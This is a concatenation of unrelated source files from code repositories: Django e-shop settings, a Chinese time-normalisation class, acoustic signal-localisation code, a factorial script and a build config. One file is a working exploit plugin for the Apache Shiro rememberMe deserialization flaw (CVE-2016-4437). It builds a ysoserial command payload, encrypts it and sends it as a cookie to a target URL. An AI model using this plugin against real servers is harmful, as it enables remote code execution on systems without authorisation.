7147c94f8b19c8ebaae2f7bc177eb4455afe89db | cde752af8df0ae3007575778ccb0d43c4d5546aa | /eshop/settings.py | 401c6cb5fb4bb8f0a3f38d581bc5aee70508a640 | [] | no_license | Code-Institute-Submissions/django-eshop-project | e9f401fca16b4c56f07a66f01accea09999f208e | a6988c80077ca45c62e1753e420616bbc6dc4275 | refs/heads/master | 2022-12-03T19:41:59.428298 | 2020-08-15T14:13:25 | 2020-08-15T14:13:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,514 | py | """
Django settings for E-Shop project.
Generated by 'django-admin startproject' using Django 3.0.8.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
import dj_database_url

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# Read from the environment; defaults to '' when unset.
SECRET_KEY = os.environ.get('SECRET_KEY', '')

# SECURITY WARNING: don't run with debug turned on in production!
# Debug mode is on only when a DEVELOPMENT environment variable exists.
DEBUG = 'DEVELOPMENT' in os.environ

ALLOWED_HOSTS = ['fullstack-project-eshop.herokuapp.com', 'localhost']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
'allauth',
'allauth.account',
'allauth.socialaccount',
'home',
'products',
'bag',
'checkout',
'profiles',
# Other
'crispy_forms',
'storages',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'eshop.urls'
CRISPY_TEMPLATE_PACK = 'bootstrap4'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates'),
os.path.join(BASE_DIR, 'templates', 'allauth'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request', # required by allauth
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.media',
'bag.contexts.bag_contents',
],
'builtins': [
'crispy_forms.templatetags.crispy_forms_tags',
'crispy_forms.templatetags.crispy_forms_field',
]
},
},
]
MESSAGE_STORAGE = 'django.contrib.messages.storage.session.SessionStorage'
AUTHENTICATION_BACKENDS = (
# Needed to login by username in Django admin, regardless of `allauth`
'django.contrib.auth.backends.ModelBackend',
# `allauth` specific authentication methods, such as login by e-mail
'allauth.account.auth_backends.AuthenticationBackend',
)
SITE_ID = 1
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
ACCOUNT_AUTHENTICATION_METHOD = 'username_email'
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = 'mandatory'
ACCOUNT_SIGNUP_EMAIL_ENTER_TWICE = True
ACCOUNT_USERNAME_MIN_LENGTH = 4
LOGIN_URL = '/accounts/login/'
LOGIN_REDIRECT_URL = '/'
WSGI_APPLICATION = 'eshop.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
# When DATABASE_URL is present (e.g. a Heroku Postgres add-on), parse it into
# a Django connection dict; otherwise fall back to a local SQLite file.
if 'DATABASE_URL' in os.environ:
    DATABASES = {
        'default': dj_database_url.parse(os.environ.get('DATABASE_URL'))
    }
else:
    DATABASES = {
        'default': {
            'ENGINE': 'django.db.backends.sqlite3',
            'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
        }
    }
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-uk'
TIME_ZONE = 'GMT'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (os.path.join(BASE_DIR, 'static'),)
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
# When USE_AWS is set, serve static and media files from an S3 bucket
# (credentials from the environment) instead of the local filesystem.
if 'USE_AWS' in os.environ:
    # Cache control: far-future expiry so browsers cache bucket objects.
    AWS_S3_OBJECT_PARAMETERS = {
        'Expires': 'Thu, 31 Dec 2099 20:00:00 GMT',
        'CacheControl': 'max-age=94608000',
    }
    # Bucket Config
    AWS_STORAGE_BUCKET_NAME = 'fullstack-project-eshop'
    AWS_S3_REGION_NAME = 'eu-west-2'
    AWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID')
    AWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY')
    AWS_S3_CUSTOM_DOMAIN = f'{AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com'
    # Static and media files go through the custom_storages backends.
    STATICFILES_STORAGE = 'custom_storages.StaticStorage'
    STATICFILES_LOCATION = 'static'
    DEFAULT_FILE_STORAGE = 'custom_storages.MediaStorage'
    MEDIAFILES_LOCATION = 'media'
    # Override static and media URLs in production
    STATIC_URL = f'https://{AWS_S3_CUSTOM_DOMAIN}/{STATICFILES_LOCATION}/'
    MEDIA_URL = f'https://{AWS_S3_CUSTOM_DOMAIN}/{MEDIAFILES_LOCATION}/'
# Delivery cost settings.  (These two constants were previously defined twice
# in a row with identical values; the redundant duplicates are removed.)
FREE_DELIVERY_THRESHOLD = 50
STANDARD_DELIVERY_PERCENTAGE = 10

# Stripe payment settings; all keys come from the environment.
STRIPE_CURRENCY = 'gbp'
STRIPE_PUBLIC_KEY = os.getenv('STRIPE_PUBLIC_KEY', '')
STRIPE_SECRET_KEY = os.getenv('STRIPE_SECRET_KEY', '')
STRIPE_WH_SECRET = os.getenv('STRIPE_WH_SECRET', '')
# Email: print messages to the console during development; send real mail via
# Gmail SMTP (TLS) otherwise, with credentials from the environment.  This
# intentionally overrides the console EMAIL_BACKEND set earlier in this module.
if 'DEVELOPMENT' in os.environ:
    EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
    DEFAULT_FROM_EMAIL = 'E-Shop@example.com'
else:
    EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
    EMAIL_USE_TLS = True
    EMAIL_PORT = 587
    EMAIL_HOST = 'smtp.gmail.com'
    EMAIL_HOST_USER = os.environ.get('EMAIL_HOST_USER')
    EMAIL_HOST_PASSWORD = os.environ.get('EMAIL_HOST_PASS')
    DEFAULT_FROM_EMAIL = os.environ.get('EMAIL_HOST_USER')
"jai.austin95@gmail.com"
] | jai.austin95@gmail.com |
e70cf9d6e63ff327f4103d60a0c7ba98634ec982 | 4d98abd2553e95856d835519424a60634fc4cdd3 | /CVE-2016-4437 Apache_Shiro_RCE/ShiroScan_1.2.4/moule/plugins/Spring2.py | 68bb19cf574477e3533d5a8f8ec6fe04827cd872 | [] | no_license | ANNS666/my_POC | 0157fa41bdd2d0f264e464b05bf9c75405083e44 | b3a38745609c9407a9bc0427f5dd55e4acfe6d70 | refs/heads/master | 2023-08-10T19:13:15.521562 | 2021-10-10T04:09:58 | 2021-10-10T04:09:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,658 | py | # -*- coding: utf-8 -*-
# By 斯文beast svenbeast.com
import os
import re
import base64
import uuid
import subprocess
import requests
import sys
import threadpool
from Crypto.Cipher import AES
from ..main import Idea
requests.packages.urllib3.disable_warnings()
JAR_FILE = 'moule/ysoserial.jar'
@Idea.plugin_register('Class26:Spring2')
class Spring2(object):
def process(self,url,command,resKey,func):
self.sendPayload(url,command,resKey)
def gcm_encode(self,resKey,file_body):
mode = AES.MODE_GCM
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(resKey), mode, iv)
ciphertext, tag = encryptor.encrypt_and_digest(file_body)
ciphertext = ciphertext + tag
payload = base64.b64encode(iv + ciphertext)
return payload
def cbc_encode(self,resKey,file_body):
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(resKey), mode, iv) #受key影响的encryptor
payload = base64.b64encode(iv + encryptor.encrypt(file_body))
return payload
def sendPayload(self,url,command,resKey,fp=JAR_FILE):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'Spring2', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ( (BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
file_body = pad(popen.stdout.read()) #受popen影响的file_body
payloadCBC = self.cbc_encode(resKey,file_body)
payloadGCM = self.gcm_encode(resKey,file_body)
header={
'User-agent' : 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0;'
}
try:
x = requests.post(url, headers=header, cookies={'rememberMe': payloadCBC.decode()+"="},verify=False, timeout=20) # 发送验证请求1
y = requests.post(url, headers=header, cookies={'rememberMe': payloadGCM.decode()+"="},verify=False, timeout=20) # 发送验证请求2
#print("payload1已完成,字段rememberMe:看需要自己到源代码print "+payload.decode())
if(x.status_code==200):
print("[+] ****Spring2模块 key: {} 已成功发送! 状态码:{}".format(str(resKey),str(x.status_code)))
else:
print("[-] ****Spring2模块 key: {} 发送异常! 状态码:{}".format(str(resKey),str(x.status_code)))
except Exception as e:
print(e)
return False
| [
"m18479685120@163.com"
] | m18479685120@163.com |
b8fecdcd2f6db4c77f8c2dd91e69e1f8869ea920 | ff3da62ab2a336ba286ea320b8bf1eba5b1978ea | /normalization/time_Info/apm.py | e242dc16e93401a0d43eed4f9fa6c779d03c8403 | [] | no_license | llq20133100095/bert_ner_time | 9e17e9de77ff12b4ae5267986f646665066e070c | 9dc3baf5ca8f6d5cc7d4255bcfd913bd695c7b5e | refs/heads/master | 2021-10-28T14:59:17.217552 | 2019-04-24T06:12:22 | 2019-04-24T06:12:22 | 182,626,582 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,688 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/11/24 16:33
# @Author : honeyding
# @File : apm.py
# @Software: PyCharm
import re
class Apm:
    """Detects Chinese day-period (AM/PM-like) words in a time expression and
    adjusts ambiguous hour values onto a 24-hour clock accordingly.

    NOTE(review): the indentation of this module arrived mangled; the nesting
    in adjustHours was reconstructed from the semantics of its error messages
    -- confirm against the original revision.
    """

    # Matches any day-period keyword, e.g. 早上/早晨 (morning), 中午 (noon),
    # 下午/午后 (afternoon), 晚上/夜里 (evening/night).
    apm_pat = re.compile(u'.*?(明早|傍晚|早上|早晨|凌晨|上午|中午|下午|大晚上|晚上|夜里|今晚|明晚|昨晚|前晚|这晚|晚|清晨|午后).*?')
    # A day-period keyword followed somewhere by an hour digit
    # (Arabic or Chinese numeral).
    apm_hour_pat = re.compile(u'.*?(明早|傍晚|早上|早晨|凌晨|上午|中午|下午|大晚上|晚上|夜里|今晚|明晚|昨晚|前晚|这晚|晚|清晨|午后).*?([0-9一二三四五六七八九两十]).*?')

    def get_apm_info(self, entity, commonParser):
        """Return True if *entity* contains a day-period keyword; when a
        parser is supplied, flag its timeUnit[4] slot as well."""
        matcher = self.apm_pat.match(entity)
        if matcher:
            if commonParser:
                commonParser.timeUnit[4] = True
            return True
        return False

    def judge_apm_hour(self, entity, commonParser):
        """Like get_apm_info, but only matches when the day-period keyword is
        followed by an explicit hour digit."""
        matcher = self.apm_hour_pat.match(entity)
        if matcher:
            if commonParser:
                commonParser.timeUnit[4] = True
            return True
        return False

    def adjustHours(self, entity, hour, commonParser):
        """Convert an ambiguous 12-hour value to 24-hour time based on the
        day-period words in *entity*; impossible combinations are reported on
        commonParser.timeAPMInfo and the hour is returned unchanged."""
        if u"早" not in entity and u"上午" not in entity and u"晨" not in entity:
            if u"中午" in entity:
                # Noon: hours far from midday are implausible; 0 < h < 2 is
                # read as 13-14 o'clock.
                if hour > 14 or hour > 2 and hour < 10:
                    print(u'不能是中午。')
                    commonParser.timeAPMInfo = str(hour) + u"点不能是中午。"
                elif hour < 2 and hour > 0:
                    hour += 12
            elif u"下午" not in entity and u"午后" not in entity:
                if u"昨晚" in entity or u"明晚" in entity or u"傍晚" in entity or u"晚" in entity or u"晚上" in entity or u"夜里" in entity or u"今晚" in entity:
                    # Evening/night words: 13-16 or 0-4 o'clock is rejected;
                    # 4-12 is shifted onto the evening.
                    if hour > 12 and hour < 17 or hour >= 0 and hour < 5:
                        print(u'不能是晚上。')
                        commonParser.timeAPMInfo = str(hour) + u"点不能是晚上。"
                    elif hour >= 4 and hour <= 12:
                        hour += 12
            else:
                # Afternoon words (下午/午后): shift 1-12 to 13-24.
                if hour > 0 and hour <= 12:
                    hour += 12
                # if hour > 19 or hour < 1 or hour > 7 and hour < 12:
                #     print(u'不能是下午。')
                #     commonParser.timeAPMInfo = str(hour) + u'不能是下午。'
                # elif hour > 0 and hour <= 7:
                #     hour += 12
        elif hour > 12:
            # Morning words present but hour > 12: contradiction.
            print(u'不能是上午或早上。')
            commonParser.timeAPMInfo = str(hour) + u'点不能是上午或早上。'
        return hour
if __name__ == '__main__':
    # Smoke test: a morning keyword must be detected.
    # get_apm_info requires a commonParser argument; the original call omitted
    # it and raised TypeError.  None skips the parser-flagging side effect.
    apm_proc = Apm()
    assert apm_proc.get_apm_info(u'早晨', None) is True
"1182953475@qq.com"
] | 1182953475@qq.com |
5110a5ba1daa96148516f99ba2b733b4c67c4cf7 | d3eb39fd54b8eaed104cee33da853b904b244344 | /src/Library/Python/pgl/signal.py | 470baf21b723762a532a8818ba5b017d865d382e | [] | no_license | MuffinSpawn/Dissertation | aab509c879752067cf799bd77abcf3cccf6eeff2 | 87047ecfbb41ab3dcde5db4c3c9768926afa27bb | refs/heads/master | 2021-01-25T13:06:08.733871 | 2018-03-02T05:16:27 | 2018-03-02T05:16:27 | 123,528,657 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,867 | py | import math
import numpy as np # NumPy (multidimensional arrays, linear algebra, ...)
import numpy.linalg as linalg
import scipy.signal as sig
import pgl.cluster as cluster
import pgl.curve as curve
import multiprocessing as mp
import matplotlib.pyplot as plt
# Compute the sum of the squared residuals between two equal-length signals.
def ssr(signal1, signal2):
    """Return the sum of squared residuals between two equal-length signals."""
    residuals = ((first - second) ** 2 for first, second in zip(signal1, signal2))
    # Start the sum at 0.0 so the result is a float even for integer inputs.
    return sum(residuals, 0.0)
# Build the N x N total-SSR matrix between two arrays of N signal sets.
# ssr() is symmetric in its arguments, so the matrix is symmetric; when both
# inputs are the same array the diagonal is zero.
def ssr_matrix(signals1, signals2):
    set_count = np.shape(signals1)[0]
    matrix = np.zeros((set_count, set_count))
    for i, set_one in enumerate(signals1):
        for j, set_two in enumerate(signals2):
            total = 0.0
            for first, second in zip(set_one, set_two):
                total += ssr(first, second)
            matrix[i, j] = total
            matrix[j, i] = total
    return matrix
def normalize(signals):
    """Divide every signal by its peak absolute value (in place) and
    return the same container."""
    for index, waveform in enumerate(signals):
        signals[index] = waveform / np.max(np.abs(waveform))
    return signals
def ac_contrib_index(mic_coordinates, test_coordinates,
                     thickness, i, j, n0, v1, v2, dt, settling_time):
    """Map the expected arrival-time difference between microphones i and j
    (for a source at test_coordinates) to an index into their lag vector.

    The propagation speed is modelled as v1 plus a distance-dependent term
    scaled by (v2 - v1) / 10; each channel is additionally delayed by
    settling_time times its channel number.
    """
    velocity_scale = (v2 - v1) / 10.0

    def arrival_time(mic_index):
        # 3D slant distance from the test point to the microphone, through
        # the plate of the given thickness.
        dx = mic_coordinates[mic_index, 0] - test_coordinates[0]
        dy = mic_coordinates[mic_index, 1] - test_coordinates[1]
        dist = math.sqrt(dx * dx + dy * dy + thickness * thickness)
        return dist / (v1 + velocity_scale * dist) + settling_time * mic_index

    tij = arrival_time(j) - arrival_time(i)
    return int(round(n0 - tij / dt - 1))
def accumulated_correlation(signals, dt, mic_coordinates, radius, thickness,
                            v_s, v_p, grid_size=10, settling_time=0, octant=-1):
    """
    Estimate the location of an acoustic event from multiple microphone signals

    The Accumulated Correlation algorithm estimates the source location of a
    signal that arrives at different times at multiple sensors. It starts by
    calculating the cross-correlation for each pair of microphones signals. For
    each test grid point, the expected time delay is calculated for each
    microphone. Then for each unique signal pair the difference in the expected
    time delay is used as an index into the cross correlation vectors. The
    value in the cross correlation vector is added to a running sum for the
    current test grid point. Finally, the test grid point with the largest sum
    is taken as the most likely source location of the signal.

    Parameters
    ----------
    signals : numpy.ndarray
        An array of time-domain signals
    dt : scalar
        The amount of time between each signal sample
    mic_coordinates: numpy.ndarray
        An array of microphone coordinates (2D array with dimensions N x 2)
    radius: scalar
        The inner radius of the cavity
    thickness: scalar
        The thickness of the end plate of the cavity
    v_s: scalar
        Base sound speed passed to ac_contrib_index as v1
    v_p: scalar
        The speed of sound in the cavity material (passed as v2)
    grid_size: int, optional
        The number of vertical and horizontal test points (default 10)
    settling_time: scalar
        The time it takes for the DAQ digitizer to read one channel
    octant: int, optional
        Restrict the test grid to one octant (0-7); -1 searches the whole
        disc (default)

    Returns
    -------
    c : list
        A two-element list containing the x and y coordinates
    """
    # The cross-correlation takes O(n) time, where n is the length of the signals
    # These loops take O(N^2) time, where N is the number of signals
    # For constant N, then, increasing the signal size linearly increases the
    # running time
    #
    # - Calculate the lag matrix (skip auto correlations since they aren't used)
    lag_matrix = np.zeros((len(signals), len(signals), len(signals[0])*2-1))
    for i,signal_i in enumerate(signals):
        for j,signal_j in enumerate(signals[i+1:]):
            lag_matrix[i, j+i+1] = sig.correlate(signal_i, signal_j)
            # The lag matrix is symmetric; store the pair both ways.
            lag_matrix[j+i+1, i] = lag_matrix[i, j+i+1]
    # Octants pair up into quadrants when choosing the grid extents below.
    quadrant = -1
    if octant >=0:
        quadrant = int(octant / 2)
    # - Create a zero matrix the size of the test point grid (sum matrix)
    sums = np.zeros((grid_size, grid_size))
    if quadrant >= 0:
        # Restrict x and y to the signs of the requested quadrant.
        if (quadrant == 0) or (quadrant == 3):
            xs = np.linspace(0, radius, num=grid_size)
        else:
            xs = np.linspace(0, -radius, num=grid_size)
        if (quadrant == 0) or (quadrant == 1):
            ys = np.linspace(0, radius, num=grid_size)
        else:
            ys = np.linspace(0, -radius, num=grid_size)
    else:
        xs = np.linspace(-radius, radius, num=grid_size)
        ys = np.linspace(-radius, radius, num=grid_size)
    # Zero-lag index of the correlation vectors.
    n0 = len(signals[0])
    # Enumerate every unique microphone pair once.
    ijs = []
    for i,signal_i in enumerate(signals):
        for j,signal_j in enumerate(signals[i+1:]):
            # Note: j -> j+i+1 because of the loop optimization
            ijs.append([i, j+i+1])
    ijs = np.array(ijs)
    # The diagonal dividing each quadrant into octants is defined by a
    # microphone direction; assumes mic_coordinates[0]/[1] have nonzero y.
    if np.any(octant == np.array([0,1,4,5])):
        # octants 0,1,4,5
        constraint_slope = float(mic_coordinates[0,0]) / mic_coordinates[0,1]
    else:
        # octants 2,3,6,7
        constraint_slope = float(mic_coordinates[1,0]) / mic_coordinates[1,1]
    """
    print 'Constraint Slope:', constraint_slope
    print 'Quadrant:', quadrant
    print 'xs:', xs
    print 'ys:', ys
    """
    # The math in the inner loop takes O(1) time
    # The inner two loops take O(N^2) time
    # The outer two loops take O(M^2) time if we assume equal sized horizontal
    # and vertical grids with M rows and columns
    # Together this is O(M^2*N^2) time
    #
    # - For each test point...
    #print 'xs = {%.2f, %.2f}' % (xs[0], xs[-1])
    for a,x in enumerate(xs):
        if (quadrant >= 0):
            # Only scan y values inside the circle for this x column.
            max_y = math.sqrt(radius**2 - x**2)
            dy = radius / (grid_size-1)
            max_b = int(round(max_y / dy))
        else:
            min_b = 0
            max_b = len(ys)
        #print 'ys = {%.2f, %.2f}' % (ys[0], ys[max_b-1])
        for b,y in enumerate(ys[:max_b]):
            #for b,y in enumerate(ys):
            # - For each pair of microphones...
            for index,ij in enumerate(ijs):
                contrib_index = -1
                # Accept the test point only if it lies inside the cavity and
                # within the requested octant's angular wedge.
                if (x**2 + y**2) <= (radius**2) and\
                   ((octant == 0 and y <= constraint_slope*x and x >= y/constraint_slope) or\
                    (octant == 1 and y >= constraint_slope*x and x <= y/constraint_slope) or\
                    (octant == 2 and y >= constraint_slope*x and x >= y/constraint_slope) or\
                    (octant == 3 and y <= constraint_slope*x and x <= y/constraint_slope) or\
                    (octant == 4 and y >= constraint_slope*x and x <= y/constraint_slope) or\
                    (octant == 5 and y <= constraint_slope*x and x >= y/constraint_slope) or\
                    (octant == 6 and y <= constraint_slope*x and x <= y/constraint_slope) or\
                    (octant == 7 and y >= constraint_slope*x and x >= y/constraint_slope) or\
                    (octant < 0)):
                    #print 'r=', x**2 + y**2
                    contrib_index = ac_contrib_index(mic_coordinates, [x, y], thickness,
                                                     ij[0], ij[1], n0, v_s, v_p, dt,
                                                     settling_time)
                # Accumulate the correlation value for this pair, if the
                # expected delay maps inside the lag vector.
                if contrib_index >= 0 and contrib_index < lag_matrix.shape[2]:
                    sums[a,b] += lag_matrix[ij[0],ij[1],contrib_index]
    # - Use the max sum matrix element to calculate the most likely source point
    max_indicies = np.unravel_index([np.argmax(sums)], np.shape(sums))
    coordinates = [xs[max_indicies[0][0]], ys[max_indicies[1][0]]]
    # Fall back to the origin if the winner lies outside the cavity.
    if coordinates[0]**2 + coordinates[1]**2 > radius**2:
        coordinates = [0.0,0.0]
    return coordinates
def peaks(xs, ys):
    """Return the x-positions of local maxima of ys, ordered by descending
    peak height.

    A peak is detected where the numerical gradient changes from
    non-negative to negative.
    """
    derivative = np.gradient(ys)
    indices = []
    last_deriv = 0.0
    for index, deriv in enumerate(derivative):
        if last_deriv >= 0.0 and deriv < 0.0:
            # np.gradient uses central differences, so the true sample peak
            # may sit one index earlier; pick whichever y is larger.
            if index > 0 and ys[index - 1] > ys[index]:
                indices.append(index - 1)
            else:
                indices.append(index)
        last_deriv = deriv
    pairs = sorted(((xs[i], ys[i]) for i in indices),
                   key=lambda pair: pair[1], reverse=True)
    # Return an explicit list (the original returned a lazy `map` object
    # under Python 3).
    return [x for x, _ in pairs]
def spectra(times, signals, padlen=0):
    """Compute one-sided FFT spectra for a set of equally-sampled signals.

    Parameters
    ----------
    times : sequence
        Sample times; only times[1] - times[0] (the sample period) is used.
    signals : sequence
        2D array-like with one time-domain signal per row.
    padlen : int, optional
        Number of zeros prepended AND appended to every signal (default 0).

    Returns
    -------
    (frequencies, magnitudes, phases) : tuple of numpy.ndarray
        frequencies has shape (n_samples//2,); magnitudes and phases have
        one row per signal.
    """
    dt = times[1] - times[0]
    if padlen > 0:
        # Zero-pad both ends of every signal.  (The padded `times` axis is a
        # local temporary only -- it is never returned.)
        signal_padding = np.zeros((np.shape(signals)[0], padlen))
        signals = np.hstack((signal_padding, signals, signal_padding))
        time_padding = np.arange(times[-1]+dt, times[-1]+dt+padlen*dt, dt)
        times = np.hstack((times, time_padding))
    # int() keeps the shape argument integral (round() returns float on Py2).
    spectrum_length = int(round(np.shape(signals)[1] / 2))
    magnitudes = np.zeros((np.shape(signals)[0], spectrum_length))
    phases = np.zeros((np.shape(signals)[0], spectrum_length))
    # The frequency axis depends only on dt and the padded length, so compute
    # it once instead of once per signal (loop-invariant hoisted).
    frequencies = np.fft.fftfreq(spectrum_length * 2, d=dt)[:spectrum_length]
    for index, signal in enumerate(signals):
        frequency_spectrum = np.fft.fft(signal)[:spectrum_length]
        magnitudes[index] = np.sqrt(np.real(frequency_spectrum)**2
                                    + np.imag(frequency_spectrum)**2)
        phases[index] = np.arctan2(np.imag(frequency_spectrum),
                                   np.real(frequency_spectrum))
    return (frequencies, magnitudes, phases)
def ricker_center_freq(dt):
    """Empirical center frequency (Hz) of a width-1 Ricker wavelet sampled
    with period dt.

    NOTE(review): relies on scipy.signal.ricker, which was deprecated in
    SciPy 1.12 and removed in 1.15 -- confirm the pinned SciPy version.
    """
    # Get the frequency spectrum of the Ricker wavelet
    # with width 1 in units of samples
    wavelet = sig.ricker(1e3, 1) # arbitrary num. of points, not too big or small
    frequency_spectrum = np.fft.fft(wavelet)[:int(round(wavelet.size/2))]
    spectrum_magnitude = np.sqrt( np.real(frequency_spectrum)**2
                                + np.imag(frequency_spectrum)**2)
    frequencies = np.fft.fftfreq(frequency_spectrum.size*2, d=1)\
                  [:int(round(wavelet.size/2))]
    # Empirically, fc/fp = 1.186; where fp is the peak FFT frequency and
    # fc is the desired center frequency.
    # - Divide by the sample width to get units of Hz
    return 1.186 * frequencies[np.argmax(spectrum_magnitude)] / dt
def translated_ricker_wavelet(times, scale, t):
    """Return a Ricker wavelet of width *scale* on the grid *times*, shifted
    so that its peak sits at time *t*.

    *t* must coincide (within 1e-9) with one of the entries of *times*;
    otherwise the index lookup below raises IndexError.
    """
    wavelet = sig.ricker(len(times), scale)
    # sig.ricker centers the wavelet on the middle sample. Integer division
    # keeps the index an int: under Python 3, times.size / 2 is a float and
    # np.roll rejects non-integer shifts. (An unused, sign-flipped `dt`
    # local was also removed here.)
    zero_index = times.size // 2
    center_index = np.where(np.abs(times - t) < 1.0e-9)[0][0]
    shift = center_index - zero_index
    return np.roll(wavelet, shift)
| [
"muffinspawn@gmail.com"
] | muffinspawn@gmail.com |
dc5e2423730112b719beb9610822a27a84026bd3 | bde6154a8195fc0da96b5368aec75c3dc3303bce | /jaruwit-6230401856-lab3/Problem 4.py | 79301e80bd35a15dfdfb0cbc1c5b19548f21643a | [] | no_license | jaruwitteng/6230401856-oop-labs | 471c4d7123fe29245d9d9f327cb23d64f42b2317 | 59a6db567fb6ef30478d44ca5fd27f6d480f5e03 | refs/heads/master | 2023-01-14T04:08:00.789324 | 2020-11-20T15:30:51 | 2020-11-20T15:30:51 | 284,852,231 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 406 | py | def factorial():
    # Keep prompting until an integer is successfully parsed.
    correct = False
    while not correct:
        try:
            digit = int(input("Enter a number to find the factorial:"))
            total = 1
            # NOTE(review): the loop variable shadows the parsed input
            # `digit`; after the loop it ends up equal to the original input
            # again, so the message below still reports the right number.
            for digit in range(1, digit + 1):
                total *= digit
            print("Factorial of", digit, "is", total)
            correct = True
        except ValueError:
            print("Invalid")
factorial()
| [
"noreply@github.com"
] | jaruwitteng.noreply@github.com |
2f45ea90c882aa17433596c733ade360b0dfb0f0 | 6af4962b62d32c77de39e7e42f5e40c12edaeeea | /node_modules/mongodb/node_modules/bson/build/config.gypi | 4c70786e495066c21ba9e6b83ca030918d15d994 | [
"Apache-2.0"
] | permissive | BelfordZ/better | b4146519dba222138df9818ae4cfdbadec86edaf | 737f3aa84eb880c94c2c8d8e96d2230aeb1d7fa5 | refs/heads/master | 2020-04-06T07:09:28.665796 | 2013-08-01T07:19:38 | 2013-08-01T07:19:38 | 11,309,668 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,078 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 0,
"gcc_version": 44,
"host_arch": "x64",
"node_install_npm": "true",
"node_prefix": "/",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_unsafe_optimizations": 0,
"node_use_dtrace": "false",
"node_use_etw": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"node_use_systemtap": "false",
"python": "/usr/bin/python",
"target_arch": "x64",
"v8_enable_gdbjit": 0,
"v8_no_strict_aliasing": 1,
"v8_use_snapshot": "false",
"nodedir": "/home/action/.node-gyp/0.10.11",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"cache_lock_stale": "60000",
"pre": "",
"sign_git_tag": "",
"always_auth": "",
"user_agent": "node/v0.10.11 linux x64",
"bin_links": "true",
"description": "true",
"fetch_retries": "2",
"init_version": "0.0.0",
"user": "26272",
"force": "",
"ignore": "",
"cache_min": "10",
"editor": "vim -f",
"rollback": "true",
"cache_max": "null",
"userconfig": "/home/action/.npmrc",
"coverage": "",
"engine_strict": "",
"init_author_name": "",
"init_author_url": "",
"tmp": "/home/action/tmp",
"userignorefile": "/home/action/.npmignore",
"yes": "",
"depth": "null",
"save_dev": "",
"usage": "",
"https_proxy": "",
"onload_script": "",
"rebuild_bundle": "true",
"save_bundle": "",
"shell": "/bin/bash",
"prefix": "/home/action/.nvm/v0.10.11",
"registry": "https://registry.npmjs.org/",
"browser": "",
"cache_lock_wait": "10000",
"save_optional": "",
"searchopts": "",
"versions": "",
"cache": "/home/action/.npm",
"npaturl": "http://npat.npmjs.org/",
"searchsort": "name",
"version": "",
"viewer": "man",
"color": "true",
"fetch_retry_mintimeout": "10000",
"umask": "18",
"fetch_retry_maxtimeout": "60000",
"message": "%s",
"global": "",
"link": "",
